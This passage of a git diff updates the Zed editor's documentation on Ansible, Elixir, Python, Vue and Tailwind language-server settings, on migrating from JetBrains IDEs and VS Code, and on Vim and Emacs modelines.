It conveniently mirrors the defaults set by [nvim-lspconfig](https://github.com/neovim/nvim-lspconfig/blob/03bc581e05e81d33808b42b2d7e76d70adb3b595/lua/lspconfig/configs/ansiblels.lua) for the Ansible language server: +By default, the following configuration is passed to the Ansible language server. It conveniently mirrors the defaults set by [nvim-lspconfig](https://github.com/neovim/nvim-lspconfig/blob/03bc581e05e81d33808b42b2d7e76d70adb3b595/lua/lspconfig/configs/ansiblels.lua) for the Ansible language server: ```json { @@ -99,31 +105,32 @@ By default, the following default config is passed to the Ansible language serve } ``` -> [!NOTE] -> In order for linting to work, ensure that `ansible-lint` is installed and discoverable on your PATH +> **Note:** In order for linting to work, ensure that `ansible-lint` is installed and discoverable on your `$PATH`. When desired, any of the above default settings can be overridden under the `"lsp"` section of your Zed settings file. For example: ```json [settings] -"lsp": { - // Note, the Zed Ansible extension prefixes all settings with `ansible` - // so instead of using `ansible.ansible.path` use `ansible.path`. - "ansible-language-server": { - "settings": { - "ansible": { - "path": "ansible" - }, - "executionEnvironment": { - "enabled": false - }, - "python": { - "interpreterPath": "python3" - }, - "validation": { - "enabled": false, // disable validation - "lint": { - "enabled": false, // disable ansible-lint - "path": "ansible-lint" +{ + "lsp": { + // The Zed Ansible extension prefixes all settings with `ansible` + // so use `ansible.path` instead of `ansible.ansible.path`. 
+ "ansible-language-server": { + "settings": { + "ansible": { + "path": "ansible" + }, + "executionEnvironment": { + "enabled": false + }, + "python": { + "interpreterPath": "python3" + }, + "validation": { + "enabled": false, + "lint": { + "enabled": false, + "path": "ansible-lint" + } } } } @@ -131,5 +138,4 @@ When desired, any of the above default settings can be overridden under the `"ls } ``` -A full list of options/settings, that can be passed to the server, can be found at the project's page [here](https://github.com/ansible/vscode-ansible/blob/5a89836d66d470fb9d20e7ea8aa2af96f12f61fb/docs/als/settings.md). -Feel free to modify option values as needed. +A full list of options/settings that can be passed to the server can be found at the project's page [here](https://github.com/ansible/vscode-ansible/blob/main/docs/als/settings.md). diff --git a/docs/src/languages/elixir.md b/docs/src/languages/elixir.md index e046e5bb0d31b8dcc8b50b32cf876cd1eb11069f..6724ef177900bab07ee4a07ccb0969e401ae5d18 100644 --- a/docs/src/languages/elixir.md +++ b/docs/src/languages/elixir.md @@ -7,94 +7,188 @@ description: "Configure Elixir language support in Zed, including language serve Elixir support is available through the [Elixir extension](https://github.com/zed-extensions/elixir). 
-- Tree-sitter: +- Tree-sitter Grammars: - [elixir-lang/tree-sitter-elixir](https://github.com/elixir-lang/tree-sitter-elixir) - [phoenixframework/tree-sitter-heex](https://github.com/phoenixframework/tree-sitter-heex) -- Language servers: +- Language Servers: - [elixir-lang/expert](https://github.com/elixir-lang/expert) - [elixir-lsp/elixir-ls](https://github.com/elixir-lsp/elixir-ls) - [elixir-tools/next-ls](https://github.com/elixir-tools/next-ls) - [lexical-lsp/lexical](https://github.com/lexical-lsp/lexical) -## Choosing a language server +Furthermore, the extension provides support for [EEx](https://hexdocs.pm/eex/EEx.html) (Embedded Elixir) templates and [HEEx](https://hexdocs.pm/phoenix/components.html#heex) templates, a mix of HTML and EEx used by Phoenix LiveView applications. -The Elixir extension offers language server support for `expert`, `elixir-ls`, `next-ls`, and `lexical`. +## Language Servers -`elixir-ls` is enabled by default. +The Elixir extension offers language server support for ElixirLS, Expert, Next LS, and Lexical. By default, only ElixirLS is enabled. You can change or disable the enabled language servers in your settings ({#kb zed::OpenSettings}) under Languages > Elixir/EEx/HEEx or directly within your settings file. -### Expert +Some of the language servers can also accept initialization or workspace configuration options. See the sections below for an outline of what each server supports. The configuration can be passed in your settings file via `lsp.{language-server-id}.initialization_options` and `lsp.{language-server-id}.settings` respectively. -Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +Visit the [Configuring Zed](../configuring-zed.md#settings-files) guide for more information on how to edit your settings file. + +### Using ElixirLS + +ElixirLS can accept workspace configuration options. 
+ +The following example disables [Dialyzer](https://github.com/elixir-lsp/elixir-ls#dialyzer-integration): + +```json [settings] + "lsp": { + "elixir-ls": { + "settings": { + "dialyzerEnabled": false + } + } + } +``` + +See the official list of [ElixirLS configuration settings](https://github.com/elixir-lsp/elixir-ls#elixirls-configuration-settings) for all available options. + +### Using Expert + +Enable Expert by adding the following to your settings file: ```json [settings] "languages": { "Elixir": { "language_servers": ["expert", "!elixir-ls", "!next-ls", "!lexical", "..."] }, - "HEEX": { + "EEx": { + "language_servers": ["expert", "!elixir-ls", "!next-ls", "!lexical", "..."] + }, + "HEEx": { "language_servers": ["expert", "!elixir-ls", "!next-ls", "!lexical", "..."] } } ``` -### Next LS +Expert can accept workspace configuration options. + +The following example sets the minimum number of characters required for a project symbol search to return results: + +```json [settings] + "lsp": { + "expert": { + "settings": { + "workspaceSymbols": { + "minQueryLength": 0 + } + } + } + } +``` + +See the [Expert configuration](https://expert-lsp.org/docs/configuration/) page for all available options. 
+ +To use a custom Expert build, add the following to your settings file: + +```json [settings] + "lsp": { + "expert": { + "binary": { + "path": "/path/to/expert", + "arguments": ["--stdio"] + } + } + } +``` + +### Using Next LS -Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +Enable Next LS by adding the following to your settings file: ```json [settings] "languages": { "Elixir": { "language_servers": ["next-ls", "!expert", "!elixir-ls", "!lexical", "..."] }, - "HEEX": { + "EEx": { + "language_servers": ["next-ls", "!expert", "!elixir-ls", "!lexical", "..."] + }, + "HEEx": { "language_servers": ["next-ls", "!expert", "!elixir-ls", "!lexical", "..."] } } ``` -### Lexical +Next LS can accept initialization options. -Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +Completions are an experimental feature within Next LS, they are enabled by default in Zed. Disable them by adding the following to your settings file: ```json [settings] - "languages": { - "Elixir": { - "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] - }, - "HEEX": { - "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + "lsp": { + "next-ls": { + "initialization_options": { + "experimental": { + "completions": { + "enable": false + } + } + } } } ``` -## Setting up `elixir-ls` - -1. Install `elixir`: +Next LS also has an extension for [Credo](https://hexdocs.pm/credo/overview.html) integration which is enabled by default. You can disable this by adding the following section to your settings file: -```sh -brew install elixir +```json [settings] + "lsp": { + "next-ls": { + "initialization_options": { + "extensions": { + "credo": { + "enable": false + } + } + } + } + } ``` -2. Install `elixir-ls`: +Next LS can also pass CLI options directly to Credo. 
The following example passes `--min-priority high` to it: -```sh -brew install elixir-ls +```json [settings] + "lsp": { + "next-ls": { + "initialization_options": { + "extensions": { + "credo": { + "cli_options": ["--min-priority high"] + } + } + } + } + } ``` -3. Restart Zed +See the [Credo Command Line Switches](https://hexdocs.pm/credo/suggest_command.html#command-line-switches) page for more CLI options. -> If `elixir-ls` is not running in an elixir project, check the error log via the command palette action `zed: open log`. If you find an error message mentioning: `invalid LSP message header "Shall I install Hex? (if running non-interactively, use \"mix local.hex --force\") [Yn]`, you might need to install [`Hex`](https://hex.pm). You run `elixir-ls` from the command line and accept the prompt to install `Hex`. +### Using Lexical -### Formatting with Mix +Enable Lexical by adding the following to your settings file: -If you prefer to format your code with [Mix](https://hexdocs.pm/mix/Mix.html), configure it as an external formatter. Formatting will occur on file save. 
+```json [settings] + "languages": { + "Elixir": { + "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + }, + "EEx": { + "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + }, + "HEEx": { + "language_servers": ["lexical", "!expert", "!elixir-ls", "!next-ls", "..."] + } + } +``` + +## Formatting without a language server -Configure formatting in Settings ({#kb zed::OpenSettings}) under Languages > Elixir, or add to your settings file: +If you prefer to work without a language server but would still like code formatting from [Mix](https://hexdocs.pm/mix/Mix.html), you can configure it as an external formatter by adding the following to your settings file: ```json [settings] -{ "languages": { "Elixir": { + "enable_language_server": false, "format_on_save": "on", "formatter": { "external": { @@ -102,46 +196,41 @@ Configure formatting in Settings ({#kb zed::OpenSettings}) under Languages > Eli "arguments": ["format", "--stdin-filename", "{buffer_path}", "-"] } } - } - } -} -``` - -### Additional workspace configuration options - -You can pass additional elixir-ls workspace configuration options via `lsp` settings in your settings file ([how to edit](../configuring-zed.md#settings-files)). - -The following example disables dialyzer: - -```json [settings] - "lsp": { - "elixir-ls": { - "settings": { - "dialyzerEnabled": false + }, + "EEx": { + "enable_language_server": false, + "format_on_save": "on", + "formatter": { + "external": { + "command": "mix", + "arguments": ["format", "--stdin-filename", "{buffer_path}", "-"] + } + } + }, + "HEEx": { + "enable_language_server": false, + "format_on_save": "on", + "formatter": { + "external": { + "command": "mix", + "arguments": ["format", "--stdin-filename", "{buffer_path}", "-"] + } } } } ``` -See [ElixirLS configuration settings](https://github.com/elixir-lsp/elixir-ls#elixirls-configuration-settings) for more options. 
+## Using the Tailwind CSS Language Server with HEEx templates -### HEEx - -Zed also supports HEEx templates. HEEx is a mix of [EEx](https://hexdocs.pm/eex/1.12.3/EEx.html) (Embedded Elixir) and HTML, and is used in Phoenix LiveView applications. - -- Tree-sitter: [phoenixframework/tree-sitter-heex](https://github.com/phoenixframework/tree-sitter-heex) - -#### Using the Tailwind CSS Language Server with HEEx - -To get all features (autocomplete, linting, and hover docs) from the [Tailwind CSS language server](https://github.com/tailwindlabs/tailwindcss-intellisense/tree/HEAD/packages/tailwindcss-language-server#readme) in HEEx files, add the following to your settings file ([how to edit](../configuring-zed.md#settings-files)): +To get all features (autocomplete, linting, and hover docs) from the [Tailwind CSS language server](https://github.com/tailwindlabs/tailwindcss-intellisense/tree/HEAD/packages/tailwindcss-language-server#readme) in HEEx templates, add the following to your settings file: ```json [settings] -{ "lsp": { "tailwindcss-language-server": { "settings": { "includeLanguages": { - "phoenix-heex": "html" + "elixir": "html", + "heex": "html" }, "experimental": { "classRegex": ["class=\"([^\"]*)\"", "class='([^']*)'"] @@ -149,10 +238,9 @@ To get all features (autocomplete, linting, and hover docs) from the [Tailwind C } } } -} ``` -With these settings, you will get completions for Tailwind CSS classes in HEEx template files. Examples: +With these settings, you will get completions for Tailwind CSS classes in HEEx templates. Examples: ```heex <%!-- Standard class attribute --%> @@ -170,3 +258,8 @@ With these settings, you will get completions for Tailwind CSS classes in HEEx t Content
``` + +## See also + +- [Erlang](./erlang.md) +- [Gleam](./gleam.md) diff --git a/docs/src/languages/python.md b/docs/src/languages/python.md index d66f52c71cb9295fe9ca94e5890de48cd1275e57..0f34fdb752143b30eb1f42a836482bd4ea1d1188 100644 --- a/docs/src/languages/python.md +++ b/docs/src/languages/python.md @@ -89,8 +89,8 @@ Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages "languages": { "Python": { "language_servers": [ - // Disable basedpyright and enable ty, and otherwise - // use the default configuration. + // Enable ty, disable basedpyright, and enable all + // other registered language servers (ruff, pylsp, pyright). "ty", "!basedpyright", "..." diff --git a/docs/src/languages/tailwindcss.md b/docs/src/languages/tailwindcss.md index db0eb1b4d255474ed671ab16ba9f6d235372efa6..e461aa2d7fa53d2e2d19e0af985a4830e8f477d1 100644 --- a/docs/src/languages/tailwindcss.md +++ b/docs/src/languages/tailwindcss.md @@ -15,7 +15,7 @@ Languages which can be used with Tailwind CSS in Zed: - [CSS](./css.md) - [ERB](./ruby.md#using-the-tailwind-css-language-server-with-ruby) - [Gleam](./gleam.md) -- [HEEx](./elixir.md#using-the-tailwind-css-language-server-with-heex) +- [HEEx](./elixir.md#using-the-tailwind-css-language-server-with-heex-templates) - [HTML](./html.md#using-the-tailwind-css-language-server-with-html) - [TypeScript](./typescript.md#using-the-tailwind-css-language-server-with-typescript) - [JavaScript](./javascript.md#using-the-tailwind-css-language-server-with-javascript) diff --git a/docs/src/languages/vue.md b/docs/src/languages/vue.md index 607d2b18a5243a5b552db96308faab6aebeb8b6c..3c2336119dfceb4aeea226bb2ccc2484dd438cbc 100644 --- a/docs/src/languages/vue.md +++ b/docs/src/languages/vue.md @@ -8,7 +8,59 @@ description: "Configure Vue language support in Zed, including language servers, Vue support is available through the [Vue extension](https://github.com/zed-extensions/vue). 
- Tree-sitter: [tree-sitter-grammars/tree-sitter-vue](https://github.com/tree-sitter-grammars/tree-sitter-vue) -- Language Server: [vuejs/language-tools/](https://github.com/vuejs/language-tools/) +- Language Server: [vuejs/language-tools](https://github.com/vuejs/language-tools) + +## Initialization Options + +### Specifying location of TypeScript SDK + +By default, this extension assumes that you are working in a project with a `node_modules` directory, and searches for +the TypeScript SDK inside that directory. + +This may not always be true; for example, when working in a project that uses Yarn PnP, there is no `node_modules`. For +editor support, the [documented](https://yarnpkg.com/getting-started/editor-sdks) approach is to run something like +`yarn dlx @yarnpkg/sdks`. In that case, you can provide the following initialization options in your Zed settings: + +```json +{ + "lsp": { + "vue": { + "initialization_options": { + "typescript": { + "tsdk": ".yarn/sdks/typescript/lib" + } + } + } + } +} +``` + +## Settings Options + +`lsp.vue.settings` is passed through to the Vue language server (Volar / [`vuejs/language-tools`](https://github.com/vuejs/language-tools)). The following settings are enabled by default: + +```json +{ + "lsp": { + "vue": { + "settings": { + // Display inlay hints for the `$event` parameter in inline event handlers. + "vue.inlayHints.inlineHandlerLeading": true, + // Display hints when required component props are missing in templates. + "vue.inlayHints.missingProps": true, + // Display inlay hints for patterns that wrap component options. + "vue.inlayHints.optionsWrapper": true, + // Display inlay hints related to `v-bind` shorthand (`:`). + "vue.inlayHints.vBindShorthand": true + } + } + } +} +``` + +You can find the upstream settings configuration schema [`here`](https://github.com/vuejs/language-tools/blob/ee5041d27940cf6f9a5150635d3b13140a9dff54/extensions/vscode/package.json#L252). + +> Note: Some settings (e.g. 
`vue.editor.focusMode`) may not take effect. ## Using the Tailwind CSS Language Server with Vue diff --git a/docs/src/migrate/intellij.md b/docs/src/migrate/intellij.md index bb10c8cdc3b9002e0aeb9a362a0a945de6f46176..adf0e20bef761385b66ad6bf55e387dd662088f4 100644 --- a/docs/src/migrate/intellij.md +++ b/docs/src/migrate/intellij.md @@ -261,7 +261,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that require plugins in other editors are built into Zed: diff --git a/docs/src/migrate/pycharm.md b/docs/src/migrate/pycharm.md index 6bef34f81cb380690764742a7b0310cbc81f2072..0ce769b06bcc1363a4dde1d9ae3c138c0b4539f1 100644 --- a/docs/src/migrate/pycharm.md +++ b/docs/src/migrate/pycharm.md @@ -319,7 +319,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that require plugins in PyCharm are built into Zed: diff --git a/docs/src/migrate/rustrover.md b/docs/src/migrate/rustrover.md index 5dc2ab10e9e3f70cd34f2582e3a2a39608168ed8..1e12202233ff1dc8f958b7acfc71a16723ed34ff 100644 --- a/docs/src/migrate/rustrover.md +++ b/docs/src/migrate/rustrover.md @@ -315,7 +315,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that might require plugins in other editors are built into Zed: diff --git a/docs/src/migrate/vs-code.md b/docs/src/migrate/vs-code.md index 367cab469acb1969909457edecba8a10c633bfc4..820158c73ffc1ec2f869ad88e34fea4697e4fbec 100644 --- a/docs/src/migrate/vs-code.md +++ b/docs/src/migrate/vs-code.md @@ -317,18 +317,12 @@ If you’re used to GitHub Copilot in VS Code, you can do the same in Zed. 
You c #### Configuring GitHub Copilot -You should be able to sign-in to GitHub Copilot by clicking on the Zeta icon in the status bar and following the setup instructions. -You can also add this to your settings: +1. Open Settings with `Cmd+,` (macOS) or `Ctrl+,` (Linux/Windows) +2. Navigate to **AI → Edit Predictions** +3. Click **Configure** next to "Configure Providers" +4. Under **GitHub Copilot**, click **Sign in to GitHub** -```json -{ - "features": { - "edit_prediction_provider": "copilot" - } -} -``` - -To invoke completions, just start typing. Zed will offer suggestions inline for you to accept. +Once signed in, just start typing. Zed will offer suggestions inline for you to accept. #### Additional AI Options diff --git a/docs/src/migrate/webstorm.md b/docs/src/migrate/webstorm.md index 72916b04c5579785d2f099f1fd2b09d7ffb11acf..3708d8dec825caf23b831a4151ee60e95c04287d 100644 --- a/docs/src/migrate/webstorm.md +++ b/docs/src/migrate/webstorm.md @@ -37,11 +37,11 @@ This opens the current directory in Zed. If you're coming from WebStorm, the fastest way to feel at home is to use the JetBrains keymap. During onboarding, you can select it as your base keymap. If you missed that step, you can change it anytime: -1. Open Settings with `Cmd+,` (macOS) or `Ctrl+,` (Linux/Windows) +1. Open Settings with {#kb zed::OpenSettings} 2. Search for `Base Keymap` 3. Select `JetBrains` -This maps familiar shortcuts like `Shift Shift` for Search Everywhere, `Cmd+O` for Go to Class, and `Cmd+Shift+A` for Find Action. +This maps familiar shortcuts like {#kb:jetbrains project_symbols::Toggle} for Go to Class and {#kb:jetbrains command_palette::Toggle} for Find Action. ## Set Up Editor Preferences @@ -63,7 +63,7 @@ Zed also supports per-project settings. Create a `.zed/settings.json` file in yo ## Open or Create a Project -After setup, press `Cmd+Shift+O` (with JetBrains keymap) to open a folder. This becomes your workspace in Zed. 
Unlike WebStorm, there's no project configuration wizard, no framework selection dialog, and no project structure setup required. +After setup, use {#kb:jetbrains file_finder::Toggle} to open a folder. This becomes your workspace in Zed. Unlike WebStorm, there's no project configuration wizard, no framework selection dialog, and no project structure setup required. To start a new project, create a directory using your terminal or file manager, then open it in Zed. The editor will treat that folder as the root of your project. For new projects, you'd typically run `npm init`, `pnpm create`, or your framework's CLI tool first, then open the resulting folder in Zed. @@ -72,60 +72,53 @@ You can also launch Zed from the terminal inside any folder with: Once inside a project: -- Use `Cmd+Shift+O` or `Cmd+E` to jump between files quickly (like WebStorm's "Recent Files") -- Use `Cmd+Shift+A` or `Shift Shift` to open the Command Palette (like WebStorm's "Search Everywhere") -- Use `Cmd+O` to search for symbols (like WebStorm's "Go to Symbol") +- Use {#kb:jetbrains file_finder::Toggle} to jump between files quickly (like WebStorm's "Recent Files") +- Use {#kb:jetbrains command_palette::Toggle} to open the Command Palette (like WebStorm's "Search Everywhere") +- Use {#kb:jetbrains project_symbols::Toggle} to search for symbols (like WebStorm's "Go to Symbol") -Open buffers appear as tabs across the top. The Project Panel shows your file tree and Git status. Toggle it with `Cmd+1` (just like WebStorm's Project tool window). +Open buffers appear as tabs across the top. The Project Panel shows your file tree and Git status. Toggle it with {#kb:jetbrains project_panel::ToggleFocus} (just like WebStorm's Project tool window). ## Differences in Keybindings -If you chose the JetBrains keymap during onboarding, most of your shortcuts should already feel familiar. Here's a quick reference for how Zed compares to WebStorm. 
- -### Common Shared Keybindings - -| Action | Shortcut | -| ----------------------------- | ----------------------- | -| Search Everywhere | `Shift Shift` | -| Find Action / Command Palette | `Cmd + Shift + A` | -| Go to File | `Cmd + Shift + O` | -| Go to Symbol | `Cmd + O` | -| Recent Files | `Cmd + E` | -| Go to Definition | `Cmd + B` | -| Find Usages | `Alt + F7` | -| Rename Symbol | `Shift + F6` | -| Reformat Code | `Cmd + Alt + L` | -| Toggle Project Panel | `Cmd + 1` | -| Toggle Terminal | `Alt + F12` | -| Duplicate Line | `Cmd + D` | -| Delete Line | `Cmd + Backspace` | -| Move Line Up/Down | `Shift + Alt + Up/Down` | -| Expand/Shrink Selection | `Alt + Up/Down` | -| Comment Line | `Cmd + /` | -| Go Back / Forward | `Cmd + [` / `Cmd + ]` | -| Toggle Breakpoint | `Ctrl + F8` | - -### Different Keybindings (WebStorm → Zed) - -| Action | WebStorm | Zed (JetBrains keymap) | -| ---------------------- | ----------- | ------------------------ | -| File Structure | `Cmd + F12` | `Cmd + F12` (outline) | -| Navigate to Next Error | `F2` | `F2` | -| Run | `Ctrl + R` | `Ctrl + Alt + R` (tasks) | -| Debug | `Ctrl + D` | `Alt + Shift + F9` | -| Stop | `Cmd + F2` | `Ctrl + F2` | +If you chose the JetBrains keymap during onboarding, most of your shortcuts should already feel familiar. Here's a quick reference of common actions and their keybindings with the JetBrains keymap active. 
+ +### Common Keybindings + +| Action | Zed Keybinding | +| ---------------------- | ----------------------------------------------- | +| Command Palette | {#kb:jetbrains command_palette::Toggle} | +| Go to File | {#kb:jetbrains file_finder::Toggle} | +| Go to Symbol | {#kb:jetbrains project_symbols::Toggle} | +| File Outline | {#kb:jetbrains outline::Toggle} | +| Go to Definition | {#kb:jetbrains editor::GoToDefinition} | +| Find Usages | {#kb:jetbrains editor::FindAllReferences} | +| Rename Symbol | {#kb:jetbrains editor::Rename} | +| Reformat Code | {#kb:jetbrains editor::Format} | +| Toggle Project Panel | {#kb:jetbrains project_panel::ToggleFocus} | +| Toggle Terminal | {#kb:jetbrains terminal_panel::Toggle} | +| Duplicate Line | {#kb:jetbrains editor::DuplicateSelection} | +| Delete Line | {#kb:jetbrains editor::DeleteLine} | +| Move Line Up | {#kb:jetbrains editor::MoveLineUp} | +| Move Line Down | {#kb:jetbrains editor::MoveLineDown} | +| Expand Selection | {#kb:jetbrains editor::SelectLargerSyntaxNode} | +| Shrink Selection | {#kb:jetbrains editor::SelectSmallerSyntaxNode} | +| Comment Line | {#kb:jetbrains editor::ToggleComments} | +| Go Back | {#kb:jetbrains pane::GoBack} | +| Go Forward | {#kb:jetbrains pane::GoForward} | +| Toggle Breakpoint | {#kb:jetbrains editor::ToggleBreakpoint} | +| Navigate to Next Error | {#kb:jetbrains editor::GoToDiagnostic} | ### Unique to Zed -| Action | Shortcut | Notes | -| ----------------- | -------------------------- | ------------------------------ | -| Toggle Right Dock | `Cmd + R` | Assistant panel, notifications | -| Split Panes | `Cmd + K`, then arrow keys | Create splits in any direction | +| Action | Keybinding | Notes | +| ----------------- | -------------------------------- | ------------------------------------------------------------- | +| Toggle Right Dock | {#kb workspace::ToggleRightDock} | Assistant panel, notifications | +| Split Pane Right | {#kb pane::SplitRight} | Use other arrow keys to create 
splits in different directions | ### How to Customize Keybindings -- Open the Command Palette (`Cmd+Shift+A` or `Shift Shift`) -- Run `Zed: Open Keymap Editor` +- Open the Command Palette ({#kb:jetbrains command_palette::Toggle}) +- Run `zed: open keymap` This opens a list of all available bindings. You can override individual shortcuts or remove conflicts. @@ -143,9 +136,9 @@ WebStorm's index enables features like finding all usages across your entire cod **How to adapt:** -- Search symbols across the project with `Cmd+O` (powered by the TypeScript language server) -- Find files by name with `Cmd+Shift+O` -- Use `Cmd+Shift+F` for text search—it stays fast even in large monorepos +- Search symbols across the project with {#kb:jetbrains project_symbols::Toggle} (powered by the TypeScript language server) +- Find files by name with {#kb:jetbrains file_finder::Toggle} +- Use {#kb pane::DeploySearch} for text search—it stays fast even in large monorepos - Run `tsc --noEmit` or `eslint .` from the terminal when you need deeper project-wide analysis ### LSP vs. 
Native Language Intelligence @@ -169,10 +162,10 @@ Where you might notice differences: **How to adapt:** -- Use `Alt+Enter` for available code actions—the list will vary by language server +- Use {#kb:jetbrains editor::ToggleCodeActions} for available code actions—the list will vary by language server - Ensure your `tsconfig.json` is properly configured so the language server understands your project structure - Use Prettier for consistent formatting (it's enabled by default for JS/TS) -- For code inspection similar to WebStorm's "Inspect Code," check the Diagnostics panel (`Cmd+6`)—ESLint and TypeScript together catch many of the same issues +- For code inspection similar to WebStorm's "Inspect Code," check the Diagnostics panel ({#kb:jetbrains diagnostics::Deploy})—ESLint and TypeScript together catch many of the same issues ### No Project Model @@ -212,8 +205,8 @@ What this means in practice: ] ``` -- Use `Ctrl+Alt+R` to run tasks quickly -- Lean on your terminal (`Alt+F12`) for anything tasks don't cover +- Use {#kb:jetbrains task::Spawn} to run tasks quickly +- Lean on your terminal ({#kb:jetbrains terminal_panel::Toggle}) for anything tasks don't cover ### No Framework Integration @@ -223,8 +216,8 @@ Zed has none of this built-in. The TypeScript language server sees your code as **How to adapt:** -- Use grep and file search liberally. `Cmd+Shift+F` with a regex can find component definitions, route configurations, or API endpoints. -- Rely on your language server's "find references" (`Alt+F7`) for navigation—it works, just without framework context +- Use grep and file search liberally. {#kb pane::DeploySearch} with a regex can find component definitions, route configurations, or API endpoints. 
+- Rely on your language server's "find references" ({#kb:jetbrains editor::FindAllReferences}) for navigation—it works, just without framework context - Consider using framework-specific CLI tools (`ng`, `next`, `vite`) from Zed's terminal - For React, JSX/TSX syntax and TypeScript types still provide good intelligence @@ -232,16 +225,16 @@ Zed has none of this built-in. The TypeScript language server sees your code as ### Tool Windows vs. Docks -WebStorm organizes auxiliary views into numbered tool windows (Project = 1, npm = Alt+F11, Terminal = Alt+F12, etc.). Zed uses a similar concept called "docks": +WebStorm organizes auxiliary views into numbered tool windows. Zed uses a similar concept called "docks": -| WebStorm Tool Window | Zed Equivalent | Shortcut (JetBrains keymap) | -| -------------------- | -------------- | --------------------------- | -| Project (1) | Project Panel | `Cmd + 1` | -| Git (9 or Cmd+0) | Git Panel | `Cmd + 0` | -| Terminal (Alt+F12) | Terminal Panel | `Alt + F12` | -| Structure (7) | Outline Panel | `Cmd + 7` | -| Problems (6) | Diagnostics | `Cmd + 6` | -| Debug (5) | Debug Panel | `Cmd + 5` | +| WebStorm Tool Window | Zed Equivalent | Zed Keybinding | +| -------------------- | -------------- | ------------------------------------------ | +| Project | Project Panel | {#kb:jetbrains project_panel::ToggleFocus} | +| Git | Git Panel | {#kb:jetbrains git_panel::ToggleFocus} | +| Terminal | Terminal Panel | {#kb:jetbrains terminal_panel::Toggle} | +| Structure | Outline Panel | {#kb:jetbrains outline_panel::ToggleFocus} | +| Problems | Diagnostics | {#kb:jetbrains diagnostics::Deploy} | +| Debug | Debug Panel | {#kb:jetbrains debug_panel::ToggleFocus} | Zed has three dock positions: left, bottom, and right. Panels can be moved between docks by dragging or through settings. @@ -252,10 +245,10 @@ Note that there's no dedicated npm tool window in Zed. 
Use the terminal or defin Both WebStorm and Zed offer integrated debugging for JavaScript and TypeScript: - Zed uses `vscode-js-debug` (the same debug adapter that VS Code uses) -- Set breakpoints with `Ctrl+F8` -- Start debugging with `Alt+Shift+F9` or press `F4` and select a debug target -- Step through code with `F7` (step into), `F8` (step over), `Shift+F8` (step out) -- Continue execution with `F9` +- Set breakpoints with {#kb:jetbrains editor::ToggleBreakpoint} +- Start debugging with {#kb:jetbrains debugger::Start} +- Step through code with {#kb:jetbrains debugger::StepInto} (step into), {#kb:jetbrains debugger::StepOver} (step over), {#kb:jetbrains debugger::StepOut} (step out) +- Continue execution with {#kb:jetbrains debugger::Continue} Zed can debug: @@ -318,7 +311,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that require plugins in WebStorm are built into Zed: @@ -359,7 +351,7 @@ If you're used to AI assistants in WebStorm (like GitHub Copilot, JetBrains AI A ### Configuring GitHub Copilot -1. Open Settings with `Cmd+,` (macOS) or `Ctrl+,` (Linux/Windows) +1. Open Settings with {#kb zed::OpenSettings} 2. Navigate to **AI → Edit Predictions** 3. Click **Configure** next to "Configure Providers" 4. Under **GitHub Copilot**, click **Sign in to GitHub** diff --git a/docs/src/modelines.md b/docs/src/modelines.md new file mode 100644 index 0000000000000000000000000000000000000000..541e44b7bae4a1fb8b4400245c2e0bf54b68dcfb --- /dev/null +++ b/docs/src/modelines.md @@ -0,0 +1,67 @@ +# Modelines + +Modelines are special comments at the beginning or end of a file that configure editor settings for that specific file. Zed supports both Vim and Emacs modeline formats, allowing you to specify settings like tab size, indentation style, and file type directly within your files. 
+ +## Configuration + +Use the [`modeline_lines`](./reference/all-settings.md#modeline-lines) setting to control how many lines Zed searches for modelines: + +```json [settings] +{ + "modeline_lines": 5 +} +``` + +Set to `0` to disable modeline parsing entirely. + +## Emacs + +Zed has some compatibility support for [Emacs file variables](https://www.gnu.org/software/emacs/manual/html_node/emacs/Specifying-File-Variables.html). + +Example: + +```python +# -*- mode: python; tab-width: 4; indent-tabs-mode: nil; -*- +``` + +### Supported Emacs Variables + +| Variable | Description | Zed Setting | +| -------------------------- | ------------------------------ | ------------------------------------------------------------------------------------------ | +| `mode` | Major mode/language | Language detection | +| `tab-width` | Tab display width | [`tab_size`](./reference/all-settings.md#tab-size) | +| `fill-column` | Line wrap column | [`preferred_line_length`](./reference/all-settings.md#preferred-line-length) | +| `indent-tabs-mode` | `nil` for spaces, `t` for tabs | [`hard_tabs`](./reference/all-settings.md#hard-tabs) | +| `electric-indent-mode` | Auto-indentation | [`auto_indent`](./reference/all-settings.md#auto-indent) | +| `require-final-newline` | Ensure final newline | [`ensure_final_newline_on_save`](./reference/all-settings.md#ensure-final-newline-on-save) | +| `show-trailing-whitespace` | Show trailing whitespace | [`show_whitespaces`](./reference/all-settings.md#show-whitespaces) | + +## Vim + +Zed has some compatibility support for [Vim modeline](https://vimhelp.org/options.txt.html#modeline). 
+ +Example: + +```python +# vim: set ft=python ts=4 sw=4 et: +``` + +### Supported Vim Options + +| Option | Aliases | Description | Zed Setting | +| -------------- | ------- | --------------------------------- | ------------------------------------------------------------------------------------------ | +| `filetype` | `ft` | File type/language | Language detection | +| `tabstop` | `ts` | Number of spaces a tab counts for | [`tab_size`](./reference/all-settings.md#tab-size) | +| `textwidth` | `tw` | Maximum line width | [`preferred_line_length`](./reference/all-settings.md#preferred-line-length) | +| `expandtab` | `et` | Use spaces instead of tabs | [`hard_tabs`](./reference/all-settings.md#hard-tabs) | +| `noexpandtab` | `noet` | Use tabs instead of spaces | [`hard_tabs`](./reference/all-settings.md#hard-tabs) | +| `autoindent` | `ai` | Enable auto-indentation | [`auto_indent`](./reference/all-settings.md#auto-indent) | +| `noautoindent` | `noai` | Disable auto-indentation | [`auto_indent`](./reference/all-settings.md#auto-indent) | +| `endofline` | `eol` | Ensure final newline | [`ensure_final_newline_on_save`](./reference/all-settings.md#ensure-final-newline-on-save) | +| `noendofline` | `noeol` | Disable final newline | 